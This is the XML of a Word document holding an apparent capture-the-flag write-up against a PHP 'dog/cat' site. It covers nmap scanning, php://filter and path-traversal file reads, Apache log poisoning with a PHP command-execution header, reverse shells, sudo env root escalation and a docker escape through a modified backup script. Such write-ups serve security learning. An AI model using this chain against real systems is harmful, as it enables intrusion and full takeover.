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5721" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Target: 10.81.182.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB537F" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="127F060F" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Date 8-12-2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18158A" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="6CFF096D" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>nmap -sS -sV -oN nmap/initial -T 4 10.81.182.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F198094" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="6066697B" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Found ssh and http opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E98AF8" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="41852C87" w14:textId="227015F0" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41065CF9" wp14:editId="744BD0B9">
            <wp:extent cx="5731510" cy="1660525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11662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9032" name="Picture 1166290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081E" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="74E62EE7" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Accessing the web it was a simple dog cat viewing website, the url looked vulnerable to LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2431D" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="14F5784B" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=dog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28149709" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="38F2FA2E" w14:textId="710B8F86" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="638E08C7" wp14:editId="7C8B14D5">
            <wp:extent cx="5731510" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1851820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20805" name="Picture 18518208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7C3E" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="7BCF45F0" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>A path traversal attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB0C36" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D04F8D" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>revealed the backend has whitelisting where only dog or cat can be used on url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88CF8F" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="548F53D3" w14:textId="5A4A25D0" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699993C5" wp14:editId="63EB326F">
            <wp:extent cx="5731510" cy="2917190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="740868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68670" name="Picture 7408686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AC4F" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="37D20055" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>So I searched for php filter for base encoding that will prevent from execution for our query and instead read it in plain text and base64 encode it for us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E63881C" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=php://filter/convert.base64-encode/resource=dog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B695BBD" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="33F112AA" w14:textId="448403F3" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17986755" wp14:editId="2424D45D">
            <wp:extent cx="5731510" cy="2908935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1690230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30706" name="Picture 16902307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D5A8" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="57C255F6" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>This was a success so all we have to do now is try to access the index page will basically give use the source code in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568A697" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=php://filter/convert.base64-encode/resource=dog/../index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBE219" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="6AAD9A7E" w14:textId="091059E9" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5355E3C2" wp14:editId="46A738E2">
            <wp:extent cx="5731510" cy="2926715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="4483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935" name="Picture 44839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C392" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="01B76BD2" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>I did base64 -d to get the raw index html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFF81B" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>echo "base64" | base64 -d &gt; index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE1315" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="05BECCFF" w14:textId="6102B55A" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF4294B" wp14:editId="3C9B06FF">
            <wp:extent cx="5731510" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12726673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67305" name="Picture 12726673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073E" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="1EE17645" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>when we subl index.php we see that not providing extension is giving us error cause it was trying to access /etc/passwd.php which did not existed. and we see vulnerable whitelisting code line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82F701" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t xml:space="preserve">                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4AB536" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="561695E8" w14:textId="6E0AE7AB" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3366773E" wp14:editId="47EB0B83">
            <wp:extent cx="5731510" cy="683260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="7114054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05413" name="Picture 7114054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E095" w14:textId="16569834" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="32F26E46" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="197D4B79" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>So our next crafted url should be for let say flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C524D7" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="04233BAD" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=php://filter/convert.base64-encode/resource=dog/../flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B52128" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Yes we got the first flag and we -d it to get it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5D60B" w14:textId="6A5F2BDA" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60224839" wp14:editId="37C9B045">
            <wp:extent cx="5731510" cy="612775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8383140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14052" name="Picture 8383140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4E05" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Now that we know we can explicitly provide extension as blank so it can actually search for /etc/passwd instead of /etc/passwd.php which does not exists, so we do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120AF08F" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=dog../../../../../etc/passwd&amp;ext=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB5027" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>And yes it works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEB678" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="4AAAEC50" w14:textId="47519670" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20050EB2" wp14:editId="2774D3F7">
            <wp:extent cx="5731510" cy="2943860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1347210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1067" name="Picture 1347210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A749" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="0A76566B" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Searching for the apache2 log path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDF181" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="7586C943" w14:textId="2EADC05A" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB90599" wp14:editId="3D22B227">
            <wp:extent cx="5731510" cy="1161415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="5362680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68044" name="Picture 5362680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02A7" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="1C46AF7D" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>We copy it in our url to try and get reverse shell out of log poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC71AB0" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>http://10.81.182.36/?view=dog../../../../../var/log/apache2/access.log&amp;ext=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1757A855" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="18E188EB" w14:textId="12168A26" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05BE9406" wp14:editId="2D209D15">
            <wp:extent cx="5731510" cy="2929255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1010426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2676" name="Picture 1010426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5027" w14:textId="02CE51DA" w:rsidR="001E6CDC" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>I checked and it executes system command like “id” into logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145BA5F" w14:textId="77777777" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E20E4">
      <w:r>
        <w:t>Then I searched for php reverse shell command online and after finding it I changed its IP and URL encoded it. Pasted it in place of "id" and then I turned on nc on my machine and send the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D4A8BC" w14:textId="1E61513B" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167605B3" wp14:editId="7A9D3ED0">
            <wp:extent cx="5731510" cy="865505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17583106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10631" name="Picture 17583106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7552" w14:textId="789C9CA1" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="487DEA30" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC">
      <w:r>
        <w:t>With header including &lt;?php system($_GET['cmd'])?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8750C1" w14:textId="77777777" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="48678F95" w14:textId="2EA65A79" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EE9AA80" wp14:editId="5E8B37A9">
            <wp:extent cx="3077004" cy="2610214"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="351337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3764" name="Picture 351337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F793" w14:textId="167DD759" w:rsidR="001E6CDC" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>And then I got netcat reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496BF749" w14:textId="6722928A" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="345CA228" wp14:editId="58C86864">
            <wp:extent cx="5731510" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="19037212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21247" name="Picture 19037212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1659" w14:textId="18A8E7CB" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Moving up a directory and listing all items I got another flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D29B45" w14:textId="2F85D151" w:rsidR="001E6CDC" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BBBE146" wp14:editId="2F1AF7EF">
            <wp:extent cx="5731510" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7876692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69236" name="Picture 7876692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7B29" w14:textId="3A6F9668" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>For privilege escalation I searched for privileged commands with sudo -l and found /usr/bin/env.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3C4A4" w14:textId="52754D32" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Then I used it to get a root shell with sudo /usr/bin/env /bin/sh -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208DE4F" w14:textId="295B5669" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Becoming the root I accessed root directory and found third flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B69E1" w14:textId="052C7050" w:rsidR="001E6CDC" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DD53A7" wp14:editId="0D16F1E6">
            <wp:extent cx="5731510" cy="2239645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="18600615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61540" name="Picture 186006154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9EFA" w14:textId="161DF239" w:rsidR="001E6CDC" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>For final flag we need to move out of this docker environment into original one so we need another root shell in the main environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DA3F9" w14:textId="4B88A152" w:rsidR="001E20E4" w:rsidRDefault="00246F50" w:rsidP="001E6CDC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="001E20E4">
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="001E20E4">
        <w:t xml:space="preserve"> this by going to backup.sh to /opt/backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEE990" w14:textId="1789730F" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Finding a Bash reverse shell on internet and changing the IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8E1E6" w14:textId="77777777" w:rsidR="00246F50" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A96DE3A" wp14:editId="1332CCF7">
            <wp:extent cx="5731510" cy="906780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="9466644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64427" name="Picture 94666442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0561" w14:textId="55A1D504" w:rsidR="00246F50" w:rsidRDefault="00246F50" w:rsidP="001E6CDC">
      <w:r>
        <w:t>I changed the backup.sh so everytime it backups, it actually execute my reverse shell script which was the freaking James Bond level stuff I have done, like a “LOGIC BOMB”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E50155" w14:textId="77777777" w:rsidR="00246F50" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25255D04" wp14:editId="26D4B285">
            <wp:extent cx="5731510" cy="1605280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6919723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72313" name="Picture 6919723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94A4" w14:textId="5B3598AF" w:rsidR="00246F50" w:rsidRDefault="00246F50" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Opening the listener on my machine and waiting for the backup, pays off within a minute and actually get the main root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCED07" w14:textId="77777777" w:rsidR="00246F50" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEA7B18" wp14:editId="23777857">
            <wp:extent cx="5731510" cy="1146175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18052717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71772" name="Picture 18052717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B27B" w14:textId="59A9D15D" w:rsidR="00246F50" w:rsidRDefault="00246F50" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Checking my id I was indeed the main root and escalated my privileges to MAX!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152F07D" w14:textId="62D1C203" w:rsidR="00246F50" w:rsidRDefault="00246F50" w:rsidP="001E6CDC">
      <w:r>
        <w:t>Moving to ~ outmost layer and listing everything, I got the final flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D366763" w14:textId="322F6185" w:rsidR="001E20E4" w:rsidRDefault="001E20E4" w:rsidP="001E6CDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A9C0E6" wp14:editId="59F6B723">
            <wp:extent cx="5731510" cy="3183890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18293022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02274" name="Picture 18293022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A62C" w14:textId="77777777" w:rsidR="001E6CDC" w:rsidRDefault="001E6CDC" w:rsidP="001E6CDC"/>
    <w:p w14:paraId="114BEB94" w14:textId="38662C5E" w:rsidR="00D939EA" w:rsidRPr="001E6CDC" w:rsidRDefault="00D939EA" w:rsidP="001E6CDC"/>
    <w:sectPr w:rsidR="00D939EA" w:rsidRPr="001E6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DC"/>
    <w:rsid w:val="001E20E4"/>
    <w:rsid w:val="001E6CDC"/>
    <w:rsid w:val="00246F50"/>
    <w:rsid w:val="00311348"/>
    <w:rsid w:val="00814CDC"/>
    <w:rsid w:val="00BA1BE4"/>
    <w:rsid w:val="00D9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EC121"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18B7252C-FA98-4133-A372-CB3312E9E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Meraj Khan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Meraj Khan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-08T12:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-08T12:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>